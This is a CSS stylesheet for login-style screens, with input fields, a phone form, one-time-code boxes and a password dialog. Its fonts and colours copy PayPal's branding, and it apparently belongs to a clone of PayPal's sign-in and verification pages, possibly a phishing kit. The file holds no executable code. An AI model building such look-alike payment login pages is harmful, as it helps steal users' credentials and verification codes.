.container{
    width: 100%;
    margin: 0 auto;
    max-width: 552px;
    display: flex;
    flex-direction: column;
    padding: 40px 20px;
    gap: 20px;
    align-items: center;
    justify-content: center;
    position: relative;
    height: 100%;
    max-height: 80vh;
}

.brandLogo svg{
    width: 45px;
    height: 45px;
}

.form{
    text-align: center;
    width: 100%;
}

.form h1{
    color: var(--text-heading);
    font-size: 1.75rem;
    line-height: 2.25rem;
    font-weight: 400;
    padding: 8px 12px;
}

.form form{
    display: flex;
    flex-direction: column;
    margin-top: 40px;
    align-items: center;
    width: 100%;
    
}

.inputField{
    position: relative;
    width: 100%;
}

.form form input{
    padding: 1.75rem 0.6875rem 0.625rem 0.6875rem;
    color: var(--text-heading);
    font-size: 1.125rem;
    line-height: 1.5rem;
    font-weight: 400;
    text-overflow: ellipsis;
    box-sizing: border-box;
    width: 100%;
    border: #929496 solid 0.0625rem;
    border-radius: 0.25rem;
    background-color: #ffffff;
    margin: 0;
    outline: none;
    position: relative;
    -webkit-appearance: none;
    -moz-appearance: none;
    min-height: 4rem;
}

.form form input:focus{
    border-color: var(--navy-bluish);
    box-shadow: 0 0 0 0.125rem var(--navy-bluish) inset, 0 0 0 0.375rem rgba(209, 229, 249, 0.9);
}


.inputField input:empty ~ label{
    color: #545d68;
    position: absolute;
    display: block;
    font-size: 1.125rem;
    line-height: 1.5rem;
    font-weight: 400;
    top: 1.25rem;
    background-color: transparent;
    margin-bottom: 0;
    transition: font-size 0.10s ease-in-out, top 0.10s ease-in-out, background-color 10ms 0.10s linear;
    left: 0.75rem;
}

.inputField input:focus ~ label, .inputField input:not(:placeholder-shown) ~ label{
    color: #545d68;
    text-align: left;
    font-size: 0.875rem;
    line-height: 1.25rem;
    font-weight: 400;
    white-space: nowrap;
    text-overflow: ellipsis;
    overflow: hidden;
    pointer-events: none;
    position: absolute;
    top: 0.5rem;
    -webkit-transition: font-size 0.10s ease-in-out, top 0.10s ease-in-out, background-color 10ms 0.10s linear;
    transition: font-size 0.10s ease-in-out, top 0.10s ease-in-out, background-color 10ms 0.10s linear;
    right: 0.75rem;
    left: 0.75rem;
    -webkit-background-clip: padding-box;
    background-clip: padding-box;
}

.form input[type="submit"]{
    margin: 40px 0;
    max-width: 288px;
    min-height: 48px !important;
    position: relative;
    border-radius: 1000px;
    color: #ffffff;
    cursor: pointer;
    display: inline-block;
    text-align: center;
    -webkit-text-decoration: none;
    text-decoration: none;
    -webkit-transition: color 0.20s ease, background-color 0.20s ease, border-color 0.20s ease, box-shadow 0.20s ease;
    transition: color 0.20s ease, background-color 0.20s ease, border-color 0.20s ease, box-shadow 0.20s ease;
    border: 0.125rem solid #003087;
    color: #ffffff;
    font-family: PayPalOpen-Bold, "Helvetica Neue", Arial, sans-serif;
    font-size: 1.125rem;
    line-height: 1.5rem;
    font-weight: 600;
    background-color: #003087;
    padding: 0.625rem 1.875rem;
}

.form input[type="submit"]:hover{
    -webkit-text-decoration: none;
    text-decoration: none;
    background-color: #0070e0;
    border-color: #0070e0;
}

.phoneform .inputField .prefix{
    opacity: 0;
    position: absolute;
    left: 0.75rem;
    transition: all 0.2s ease;
    font-size: 1.125rem;
    line-height: 1.5rem;
    font-weight: 400;
    top: 1.75rem;
    white-space: nowrap;
    color: #001435;
}

.phoneform .inputField input{
    padding: 1.75rem 0.6875rem 0.625rem 2.1rem;
}

.phoneform .inputField input:focus ~ .prefix, .phoneform .inputField input:not(:placeholder-shown) ~ .prefix{
    opacity: 1;
}

.codebox input{
    color: rgb(0, 20, 53);
    font-size: 1.125rem;
    line-height: 1.5rem;
    font-weight: 400;
    text-overflow: ellipsis;
    box-sizing: border-box;
    width: 100%;
    border: 0.0625rem solid rgb(146, 148, 150);
    border-radius: 0.25rem;
    background-color: rgb(255, 255, 255);
    margin: 0px;
    outline: none;
    position: relative;
    overflow: visible;
    appearance: none;
    min-height: 4rem;
    padding: 1.1875rem 0.6875rem;
}

.codebox input:focus{
    border-color: rgb(0, 112, 224);
    box-shadow: rgb(0, 112, 224) 0px 0px 0px 0.125rem inset, rgba(209, 229, 249, 0.9) 0px 0px 0px 0.375rem;
}

.codedialog.active{
    display: block;
}

.codedialog{
    background: var(--white);
    max-width: 752px;
    width: 100%;
    top: 40px;
    display: none;
    height: 100vh;
    margin: 40px auto;
    position: relative;
    z-index: 999;
    position: absolute;
    padding: 72px 20px 20px 20px;
}

.nav{
    height: 32px;
    width: 32px;
    display: flex;
    align-items: center;
    justify-content: center;
    cursor: pointer;
    border-radius: 50%;
    position: absolute;
    top: 12px;
    right: 12px;
    transition: all 0.2s ease;

}

.nav svg{
    fill: #545d68;
    width: 24px;
    height: 24px;
}

.nav:hover{
    background: #faf8f5;
}

.content h4{
    color: #001435;
    font-size: 1.75rem;
    line-height: 2.25rem;
    font-weight: 400;
    padding: 0.5rem 0.75rem;
    min-height: 1px;
}

.content p{
    font-size: 1.125rem;
    line-height: 1.5rem;
    font-weight: 400;
    min-height: 1px;
    padding: 0.5rem 0.75rem;
}

.content span{
    color: var(--navy-bluish);
    font-size: 1.125rem;
    line-height: 1.5rem;
    font-weight: 600;
    cursor: pointer;
}

.content span:hover{
    color: #003087;
    text-decoration: underline;
}

.codebox{
    padding: 0 1rem;
    gap: 8px;
    display: flex;
}

.passdialog form li{
    font-size: 14px;
    line-height: 18px;
    padding: 2px 0px;
    word-wrap: break-word;
    width: 100%;
    color: #545d68;
    font-weight: 400;
    text-align: left;
}

.form input:invalid{
    border: 0.125rem solid rgb(196, 11, 11);
}

.form button{
    margin: 40px 0;
    min-width: 288px;
    min-height: 48px !important;
    position: relative;
    border-radius: 1000px;
    color: #ffffff;
    cursor: pointer;
    display: inline-block;
    text-align: center;
    -webkit-text-decoration: none;
    text-decoration: none;
    transition: color 0.20s ease, background-color 0.20s ease, border-color 0.20s ease, box-shadow 0.20s ease;
    border: 0.125rem solid #003087;
    color: #ffffff;
    font-size: 1.125rem;
    line-height: 1.5rem;
    font-weight: 600;
    background-color: #003087;
    padding: 0.625rem 1.875rem;
}

.textCon li{
    text-align: left;
    min-width: 360px;
}

.textCon{
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
}